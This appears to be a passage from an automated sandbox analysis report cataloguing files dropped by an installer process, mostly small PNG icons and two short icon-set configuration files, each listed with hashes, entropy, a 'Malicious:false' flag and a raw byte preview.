                                                                                                    SSDEEP:12:6v/7iIniUpZVqDOd94j4MwzQPlA89rnKP69TRUQMGsVc7:giUpXjBMwMPlA8BZ9OFGsk
                                                                                                    MD5:FE02DBEC1FBF19F2525E9C87E3023C7C
                                                                                                    SHA1:9503756A6C1CB9C742B6852F121B6D8092C06578
                                                                                                    SHA-256:CB2D73D2E08790836F67F4CCA213206C071F2215D65CCD0099EDD2B9A912B578
                                                                                                    SHA-512:CADBCCEE87CB20DA46E1E4BD9241EE22CF7BA6DE9B8ECAD2D1F3831A8AAE5D0061663F57815BCA19F2580C824EC599891726A240292E6AB289013A6AE971E2A0
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDAT(.U..k.A.....^.W.Mj*.D.P.^..._. .BJJ.h.....Kv...&B..............H.....6..1.22s..t:............4=.......#.#\]..s......./.....t..{;.....+<y|.4=Dr..(*....>..d.]7h>8.{yT...N.........m...c...NO.X....V...F.7. ....n.io.n...I.T.2..F....q+`..$.0...!...P.{U`..1...'.J..B.w..1.!...<...J..[.........j...A.<.c...A~...R.Z<...85@.KI\....1..m........\v....FU....`.T.e.#......_`.rC].s^.S.r]W... _.C.Cu...ju.....5._...P....r..^A.r\^|.$y...&..<......y.e..s\.....dc.....!O..qE.h...I..s..Z...?...4f%......IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139
                                                                                                    Entropy (8bit):5.9354638900987355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll3MOgkBQTBlH/DVgPMWwnPUmLdeAkhBsF6c4V1B/0wXjp:6v/lhPW/cOlcBZKkWoLdePhq2BcwTp
                                                                                                    MD5:5EACCA1FC3A11F7E844B3809D9CAA537
                                                                                                    SHA1:86AF79F715B3921E507068558EEDC94EAAC677C6
                                                                                                    SHA-256:57A9751B8A85FD13C3F0C9EEAEB3B905D7B8802779EFE407E13444468A15C396
                                                                                                    SHA-512:997D5D631FF90CAD01D1613A347BF2C1F9D0723AF29A5CA52494BBEF97F4FA50040B171FD371F8A8FD31DDA2933EF0752ABC3056625A9DB747BC5E24EB6F7CD2
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W...RIDAT8.c`...........0h)._..` f....!...P9J....@.F.....;%....@,EI`..b.J....<..a.....z...l....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):641
                                                                                                    Entropy (8bit):7.486329990930914
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2HcHsH4mHgE42VgbsrP2eByHKk8a4JLk++8/1:HS2H8mJJfIsrueEq9z+c1
                                                                                                    MD5:752E6CDC2C92BF4D22712F33A380CB93
                                                                                                    SHA1:07AC399AD6C9F72E97A1304E1324AD20EB42F633
                                                                                                    SHA-256:3294FEF8285A13B09967D3F631F8CE52C2AACC9A07604CD51B70811BED2ED40E
                                                                                                    SHA-512:9DC2C06873DE889B4E26AA9890B93E6FD37D04C73801865861FA46B95C2011BFEEC94B24F37BBD376C43E993FEE58D1C4A221AF09346CE70AF86BF379BD6CCA2
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....1*........IDAT(Se..k.A...|.n...n..T.%&X.....7.d_.".KA..T.J..Z.....w6D..e.e...=s......S.x..G=.....8"S.%/..|.....8=y1....:2...;.B.(K.I.W.kE../>....Z.r?.7<.~....t...BJ.i../.J...tz......7..!.J,.#..v.....9.Y....YQ....?|t............$V.@....zp...;!TU.M.......A..N.....[..V...&....9..xm..d2F.m..`.N......&.A.DU.....y.4....4....`8...\.|...y...q.]^~......@qXor....Ik..3.@+..V~d...........?7k...`.C.P.ZT.....QF-E.{..+5!... .6..(.i..`m....._~..e.n5.`0..z...Qr..IF.E..9Y.....r~ [.@8...k2*...$....n...orX'#..&........X....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):69
                                                                                                    Entropy (8bit):4.258998795700668
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPlv5hrl6hJbF/k3ollkup:6v/lhPZcJq4ldp
                                                                                                    MD5:A7204A9D9C26A12DD3C0B069EFD8ACAC
                                                                                                    SHA1:5E1E54C75D7D83147DD57DCCBCC5302D1798B21E
                                                                                                    SHA-256:FA56F736618C032485F27BA183FF0D5226006E2080CF20813AF1C6A7B93F4AA3
                                                                                                    SHA-512:7401056BE66AE9CDAF9EFEF6DBA0F96384964DA491F538C35C283419EE819F767D6BFC601E2FEF8445FA25A447A5550C6CD8986330329981B852940EC334F08F
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.....................IDAT..c..`.......%......IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):333
                                                                                                    Entropy (8bit):6.65458733329839
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhP6IcHMRfCCllSJPwlzkv8z8zKWHCB9mowuVIRmCtIyWDoKby2Fb/67YEFp:6v/7iIGMfbllL5zMKWHCBBIRwyW0KbzG
                                                                                                    MD5:16CE13BC8208F1C0B9422FFAFBC46C6E
                                                                                                    SHA1:FB6B11EE39E0143A056385B25761FCB0E9ED980B
                                                                                                    SHA-256:1EC3BD426CCE1B1BD23664ADCC11FE51D04DE791FADB6A731DE7EB5076B26163
                                                                                                    SHA-512:46EB74547599EED50ED554DCAD5567198D20AAEF7B8D0F2F22E1912224F381F91F5501E4985B007945FC5D4A12B85ED0E06184168F6EE614135C8AFAE13334A5
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME......'.i.h....IDAT(.c`..@VV.WNN.]FF.WJJ.OZZ...............Z...B..Alsss.SSS......,CCC..$.q``.\XX.5N.UUU......pII..N.3g.4....'N.h.S..;U.]+..hXf...j85>~....+j.O..>~..$......8s..+....?..?..{'...{./_.H.}.y..0.15c..B......IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):324
                                                                                                    Entropy (8bit):6.776590990847706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhP6IcHMRfCCllSP7k0Rt64huUPOfsIuDRWi9I1z2He4hsCvJgVm/kup:6v/7iIGMfbll8g0RciuU2fy9I1zg3lJP
                                                                                                    MD5:389BCEA15865028B56A0A70C87E13DCA
                                                                                                    SHA1:B771E6A3E73B2B3E4B440B2E59D98E9D7F3B60C7
                                                                                                    SHA-256:5CAA4636ADE7C9B36E257D1AB01D06FDA59310781F4C1E5B527342D5DD8B8DE3
                                                                                                    SHA-512:BDD82387E62B1726B402B1BE8B87CD2BF02C794A77525E4780A96DAE71E6CBF5F17261706A161A7AE1FDB8F15542DD2A3046ABE0A3328B5139C99F9F9CDDDFA3
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME......*........IDAT(.....0....Uh..C#`....&._...p%..qs.....H...K:....E.S...u....TU.+.R5M..B.m..y.._... ..Zk9M.`.}*.>..C..8.:..I...8.....a.v.......h.b..A....n.T...C...c.%...G..i.2J.+.J)GB...wY......:...,.D.Y?..F..Z.....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):593
                                                                                                    Entropy (8bit):7.479894563773081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIniUpZzmH9D1hP79P2J2ySk9BvSpqKu6kZPdiaXVygV271:giUpMDrD8J2ySMKIZoaX0gV271
                                                                                                    MD5:FFCCEC64441F01C7AA82069BB8D5E9D9
                                                                                                    SHA1:45C02522F48129065104E1C9B4E6AC63434CC7D9
                                                                                                    SHA-256:B8CEB44936275B37F8D08F71F01F223866CEE50E53182D529A3768514A8C7662
                                                                                                    SHA-512:E8709643F6C4CBAA98F7BF870028664324DE673141F1B9FCE995A03D011C4374817846DCED739B4A3DD37D315A474F739ACAD2933ACA63C67FA0216356B8E608
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDAT(S...n.@.....I#;.X.j...U,.@..x..Bx.D.....W..X.b...Fqq.Z.RED8...3.s..l.H..9s...9:D)..1^..m.........R.@...>.T...97..=..z[......i7Q...<...F...di.......R....]...F...u.......W?41&v.6.O^.%ko.\".qH...)....$..z.NJe{o....."..N....NgXDK.q...y...d.@.q].20.9..(...A.a|~.J..F..$..2pn....$....N.4.2AR.R......`"3..R_....[v.h.n.!...5Gq..QA.Y,.....\..Z....{.h.............mU-..T.Ga..0.{....w..$K..?oN....4KW......'^py.fd..L.)L.z.O(..D..)H...............<....o....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):502
                                                                                                    Entropy (8bit):7.307082621377148
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H5kGLptWrJMNbLtUWrPwIfYSA2go4aOq07:HS2H6G16JEbSuff8hnaOq07
                                                                                                    MD5:9BBFAFFA43A8745739977748E1680DAB
                                                                                                    SHA1:A2DE96CC6B8D6A22F2E517ED8828A0E65769C6EB
                                                                                                    SHA-256:EAD5682AA1875AC0664177D32B817A0BE555B90AABB88DD8FA914FAF42125896
                                                                                                    SHA-512:3E1E77835D3786D1FFAE02EAEFD41FEF7BD55955F08806C176A5E5A06169029F07E194D001927E5AEAD066FA41C90CA1B41E354F274C3AA1C6A78EF0E37717E1
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....2...i....vIDAT(S.RKj.Q.4..=....*.h.......].....y...E.j.O.....d.,.7..._.......`0.....p8|...}[..H......t..j...l`.6F....2G..x.D.7...^..8......d..{e%..H$.\...x..j..~....B.R..d......}d2.d.Y..u,..l.[.v;....P(.4..D..+^....<.."..*.g..Q.Z..r...4!E>..LT*....n..l4.*FQ..VI.....&..........eYOVM6...@....5...L.T*.J...p.rq..=."p2.`6.a:.....I5.s........I..\.@..F....rB.b..I....'...r..O...{7.\....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):517
                                                                                                    Entropy (8bit):7.3380534299819
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H4ZZG1CXGrA0JI/88sXEZ1gBxPibGo1+bsI:HS2H4ZGCWXC/tHZ10PiaJP
                                                                                                    MD5:156D5836B29559FD2A8AFACFA2931192
                                                                                                    SHA1:D92B24898B7483591E5B088C60D05B73355AD0EC
                                                                                                    SHA-256:ECE2829963DECBC954FDBC7F831451D36F1248EBDEAAC181B68AEBEC00BE3555
                                                                                                    SHA-512:591CCEED7768A3D6C87A9DC7EE34F9B1A1463AEE30C184027C24294901179BA9C6BFF697FD7004E22F12605D45CB7BC18FFE1C9D7D798A7AB40004FF36FBC656
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....2.........IDAT(S..Ij.Q....v..a..m..(...}...!.&!'.W.=T...mW.....<t..X...$.....E..G...R..;.i>.C.z._...p8|.n...o6.w....r..r9.8..M...h4.....;q...7.M.t.Z.Z-[*..P((.Z.R.......l`.AN.%.LVR..aY.!...@...#......^i4........r...nG..^....f....gd`.~0.9hD,.S.a..>e2.8T......E..t..x.= d..".._@..$...Bq..m=....f..n#.,.t.Z..EW...o.1w1B]p .....0b....w.^'...=.`p:.tD|.d2...i..\..=9......j......<1..._...+."..V|....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):636
                                                                                                    Entropy (8bit):7.494209461570772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIniUpZVqDOd94j4MwzQPlA89rnKP69TRUQMGsVc7:giUpXjBMwMPlA8BZ9OFGsk
                                                                                                    MD5:FE02DBEC1FBF19F2525E9C87E3023C7C
                                                                                                    SHA1:9503756A6C1CB9C742B6852F121B6D8092C06578
                                                                                                    SHA-256:CB2D73D2E08790836F67F4CCA213206C071F2215D65CCD0099EDD2B9A912B578
                                                                                                    SHA-512:CADBCCEE87CB20DA46E1E4BD9241EE22CF7BA6DE9B8ECAD2D1F3831A8AAE5D0061663F57815BCA19F2580C824EC599891726A240292E6AB289013A6AE971E2A0
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<.....IDAT(.U..k.A.....^.W.Mj*.D.P.^..._. .BJJ.h.....Kv...&B..............H.....6..1.22s..t:............4=.......#.#\]..s......./.....t..{;.....+<y|.4=Dr..(*....>..d.]7h>8.{yT...N.........m...c...NO.X....V...F.7. ....n.io.n...I.T.2..F....q+`..$.0...!...P.{U`..1...'.J..B.w..1.!...<...J..[.........j...A.<.c...A~...R.Z<...85@.KI\....1..m........\v....FU....`.T.e.#......_`.rC].s^.S.r]W... _.C.Cu...ju.....5._...P....r..^A.r\^|.$y...&..<......y.e..s\.....dc.....!O..qE.h...I..s..Z...?...4f%......IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):559
                                                                                                    Entropy (8bit):7.393060209024772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H1ClNHN+5CWPctjcNirsMD0YrO5kOBMlz:HS2HkHeCmPGxbibO9
                                                                                                    MD5:C720EFDABF3F8B47BD07FCFE80AF5608
                                                                                                    SHA1:A63400832DC55C911113C0176DA2EE6DF04F5D4F
                                                                                                    SHA-256:C81909BB15E1417A075DB27E1FA348C9371F68BF55B434FC70FB28FD5AED37AD
                                                                                                    SHA-512:1EF5ADCDE29FC4316DB7292D53741C3330BF17203B24EFDB6D1112413763FE37822BBDD9008B0C0E7A2210FA519D56922CB574C23043A12954FEF9ECDCBF382D
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....0..a......IDAT(.U..j.A.....#.B.B...H!.Jc..". !u.@.&.E .`X.Pl....].s....\f...=g..\.b.z..,.j:.S;.N.<.>.....N..4....=...f.*..{.BA<..t*..$..f.........r]..Z..*....iI&....H............J...@A.X,>@I.....q..b..T.Vu...._,./.v....3...}_'...Q]...H;a....T*.c..n.m1...g..J..#J)..\\>....#.C..D.3...d\.^^....q%hlse.....~..L.f.L.LaZ..g.Jw...n....y.......>....M1.I4.. ...@...A.1... . |.lV..[C.A.n.P.U*.T.\.r.... ..8..FK...#w;..y.r...]...............IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):549
                                                                                                    Entropy (8bit):7.372873904443628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H0ZF0NS5rNgZK5S80iwpLboX30XuQBMBVEB5Hk:HS2H/NS17A8v1X3wuxYY
                                                                                                    MD5:FA26AC420BEA517A2C4247572E33842E
                                                                                                    SHA1:06DE61402AAA1A2ADC2EF2969E76B7200A9D13AA
                                                                                                    SHA-256:8D8451A732FA6662F6FCE32CCF6751E421C6FFC7C5B819C29AB1482967B05FFA
                                                                                                    SHA-512:8850CFCD06A82FA41D4B30F88DE5485857B2BD1B548CEC4A7F38B78E3427AEDA01B44762161D8352501F6AE0EBBAEE82AF71F52296CCB93399B4C01C6864D382
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....0.[.......IDAT(.mR.j.@........(.".."~C.n...Q.!...n.u.O.).+A.*..&>{..)..\2s.{....z...m..W.T.r.<0.....po.. 0X..Az..3....J....L.S..f.r..P....."I.T..hx.fS...../.lV.(..z-.~_..qx>..HV....b..J%Z...@.........e.X.A.%....LFN..&1.&..X.......l.,.T..@....m]`...j...b.s ...c.Z+.N.$..R.@.i..s.H.-....).0W`....I..D.x/xF7.(>.~..LuCf.L$..a...`.}...q....=5.! ..r.........I...6..8.]rnF...j...j5..-...|>....$@.nG.9. .":..!...x<....._.....`7....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):641
                                                                                                    Entropy (8bit):7.486329990930914
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2HcHsH4mHgE42VgbsrP2eByHKk8a4JLk++8/1:HS2H8mJJfIsrueEq9z+c1
                                                                                                    MD5:752E6CDC2C92BF4D22712F33A380CB93
                                                                                                    SHA1:07AC399AD6C9F72E97A1304E1324AD20EB42F633
                                                                                                    SHA-256:3294FEF8285A13B09967D3F631F8CE52C2AACC9A07604CD51B70811BED2ED40E
                                                                                                    SHA-512:9DC2C06873DE889B4E26AA9890B93E6FD37D04C73801865861FA46B95C2011BFEEC94B24F37BBD376C43E993FEE58D1C4A221AF09346CE70AF86BF379BD6CCA2
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....1*........IDAT(Se..k.A...|.n...n..T.%&X.....7.d_.".KA..T.J..Z.....w6D..e.e...=s......S.x..G=.....8"S.%/..|.....8=y1....:2...;.B.(K.I.W.kE../>....Z.r?.7<.~....t...BJ.i../.J...tz......7..!.J,.#..v.....9.Y....YQ....?|t............$V.@....zp...;!TU.M.......A..N.....[..V...&....9..xm..d2F.m..`.N......&.A.DU.....y.4....4....`8...\.|...y...q.]^~......@qXor....Ik..3.@+..V~d...........?7k...`.C.P.ZT.....QF-E.{..+5!... .6..(.i..`m....._~..e.n5.`0..z...Qr..IF.E..9Y.....r~ [.@8...k2*...$....n...orX'#..&........X....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):556
                                                                                                    Entropy (8bit):7.316549998180671
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H9fw3E/3lkWcxh66ScOaqgx531nDqLwzIdjzRvL77:HS2H9YU/eWIfScvbnDzzchvLH
                                                                                                    MD5:E4118A159AC2AAB1876E440CF770CA3D
                                                                                                    SHA1:27A28242395D33530A955D2D6FE479A9D45DB0CC
                                                                                                    SHA-256:08268FF255BFD01B6AA0184ECD06B5A0C48D016BC429D3B155B7149A8CD10FDF
                                                                                                    SHA-512:611EAC1EB04097730CD7B8D9C52FF7DA5D2F741E8C4A54F291C0137B75DD326F42CF35AEDBDB17D153BA20845904BE9F1F3753069B36D3050E907FA5C3D3461A
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....0;..]....IDAT(SmR-o.A....;.8.5.....T..V`+....6.....L-..... ...Q........L2...y3ogF;..BI.Rq5M{.u.t8...3......{..j3..) @O.|$...b..q..z.......F3$x....$.4..l6...[.B..<...R4..E....k.r.E.^.X.K..b...|...J0..F.g..y&.TM&.n>.......).@[Uv.Gx...z...G)..X.hT.-,...XL...V....\.g.W....).. ."..<..Z.N.j.d..a...D..8).L.`...b.F{0.<b..A0.DUB.J:..I.mr.....t-f..V+.d...|.....n~....g.....~NW.'...t:c.....R)....(.d..v.`...V...e.f.!........)...[..-./..._x=t<....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):551
                                                                                                    Entropy (8bit):7.319024742694981
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2HRd4HSOKRcIzpsbPjUdb4pndLBaXeeFUDqtCmN09:HS2HRd4HSBR5KbPognzadIb
                                                                                                    MD5:731657BF68ECC98F0DBE29095CCB88F7
                                                                                                    SHA1:D3B49C3AD148EC96F3088371715121D32EAA7843
                                                                                                    SHA-256:F95DA774191F393BA0EB0436B4CB22920C5F880ED51010177E6E9189CD36C44A
                                                                                                    SHA-512:DE50FC25578922C8BE31D869B70FC0559C965022D6BCCF71DE6CDD541B424DB67E1AE1032AEBAAE03DF66744A27344194AA7994C9CE84317D1AFD1B437D9AA9E
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD..............pHYs.........B(.x....tIME.....04.k......IDAT(..R.j.Q..}..z.%..h.N..OHa../H.......E>!HPl...F\.+n|f..1.*......9.v.\H.Z.&4M{.u.~>.....w>w....v...)"......"...a....@....n.kN.`.kH.)...K..kY..N.0..#1...=..s...A..0M.\..p%.R...B.b..f3..........."......q.J&...).N.b....5A......@.&.c.!.d...\.Z.Vu..V....."H.xO$...e.HX,....WL.`....F....."...m[bu..c.B.u.u..PB..4...U..._.]..*....KY...l<..a .v..>.s.4.....f#..}0..d2.8A#......*wUU...}.N.?.p=rlJ+.J.n..J#.......7\.R.-.c%....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):437
                                                                                                    Entropy (8bit):7.172409807946269
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMfbllRNTwF4Aca6vxsbrVnsgP7F9J6Jz17:HSbHRhwF4A56vuZ/Z6t17
                                                                                                    MD5:E51360FDC759C15DEF4ED591275F6E37
                                                                                                    SHA1:723E725BAB93316AA5CBEEAF65A782777DD28983
                                                                                                    SHA-256:559FD805D661B05A7B67119EF93067D6BF076D5A92470F343332D80EB6C67168
                                                                                                    SHA-512:8BE34022F9188993A642A10A31D3AA05865254C69134726F5C1891E6537AF94A6E625D63A6E8D3C058A10E49A60D03C407AD8D6D70F09452D91957680D99E115
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME........Oj....5IDAT(..IN.@........7n.....\.3@....0&2...._./..J.Tu..5.8.fQ...;......|....*...[.$..>.#..z_A.,....|;.i.^.2^...5...R..U..y.,.8<...<.-;cJ)..E.(.0.....Z.s]..B....:..1.;dud...P..D.G.J..4Ml/.l..!.3.H....q.I..H..a.....I.uK`..^ ...s...2gL..\..(h@!.....R(S...8....a...K.kAf..."V.h0...N?v..}.~..c...t$!&.lo?..z...qm....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):434
                                                                                                    Entropy (8bit):7.191504491746101
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMfbllDGOEGFo+bciyq44LnHolz:HSbHCOEUo/W4EHa
                                                                                                    MD5:7E5A76C4CF167C7549FAD937DC8B3DA3
                                                                                                    SHA1:7BDBE8BE6737C51C292AA8F51F9586DB0432AB39
                                                                                                    SHA-256:77D9DBC6CC93882EEC1BA969D14AD6C0FDEFE35302F0F930751C4B5BAED2ABFE
                                                                                                    SHA-512:30D230F3F7A62425D92B5227D482E000741C34769BB88CB0F4EDABA782D3834892D9C0A1BC4468DA667951FF489453FD2B3B426ADC38BF6BA5EA34CEEACCC077
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR..............H-.....sRGB.........bKGD._._._.4.....pHYs.........B(.x....tIME........A.....2IDAT(...j.@...O..b......l..>....v..U.....X.t.L....x.{.Q.n....A.m/).jG-..)..~....2-...Ey..jQY....u=4Mcr......<.i..7.....*.....(..s..i....*.+.......!...^V.v.. .f..b1H..E.Yh.w.........7..$...5..R.....f.~.T.l+..^.<.....'&I.1..pG'...i...d2.0...DQt..Yny.".`]....%@.)?L;.u..........yK.....s~.}...?.8.Ty2y.....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24
                                                                                                    Entropy (8bit):4.136842188131013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1ERdiAqRv:1+MJ
                                                                                                    MD5:2BE834BAC02BFB69E1E7935A62A6B8FB
                                                                                                    SHA1:6165F776AC298A991E497B03E9C2E1797ED81029
                                                                                                    SHA-256:113DBDDEAEE29ED930AF404A0C0D5356A95D9D1B53BAE343F2782A29B5D4DBC9
                                                                                                    SHA-512:1F3BC0176EC15394E6CAD295A077F33C66BD9FEA4598715B5EDED4DDE397DE519FFC6D171E9DB53A09A50929FE6D8EDE5D4D51B5B786A0C3BE6481CB7A5BA4FC
                                                                                                    Malicious:false
                                                                                                    Preview:[General].Iconset=Light.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24
                                                                                                    Entropy (8bit):4.136842188131013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1ERdiAqRv:1+MJ
                                                                                                    MD5:2BE834BAC02BFB69E1E7935A62A6B8FB
                                                                                                    SHA1:6165F776AC298A991E497B03E9C2E1797ED81029
                                                                                                    SHA-256:113DBDDEAEE29ED930AF404A0C0D5356A95D9D1B53BAE343F2782A29B5D4DBC9
                                                                                                    SHA-512:1F3BC0176EC15394E6CAD295A077F33C66BD9FEA4598715B5EDED4DDE397DE519FFC6D171E9DB53A09A50929FE6D8EDE5D4D51B5B786A0C3BE6481CB7A5BA4FC
                                                                                                    Malicious:false
                                                                                                    Preview:[General].Iconset=Light.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15008
                                                                                                    Entropy (8bit):5.270725103917416
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:s/nUm8NYR/fiYM8LXMX5fs38Ffx4Bf0lAT9:s/nX00iY/XMXq38FxK0lq
                                                                                                    MD5:64C98ACB587FC7E4F237EADAA84A591D
                                                                                                    SHA1:B92C3D066E67FC230D56E690AE1CC21222265614
                                                                                                    SHA-256:6E8E87C68E7EFC5CCF8694042649DE3EBA01EC1DF242C22D40842AF885D1118D
                                                                                                    SHA-512:B1542C0E3D5411CD8581150FE2D81401C93686E7E43754E8BF8F78ACBEB73A041F7D9223D7DC8072C132273D1DB6EB9917ED04F9F2123C1CEA4062E59CD7F129
                                                                                                    Malicious:false
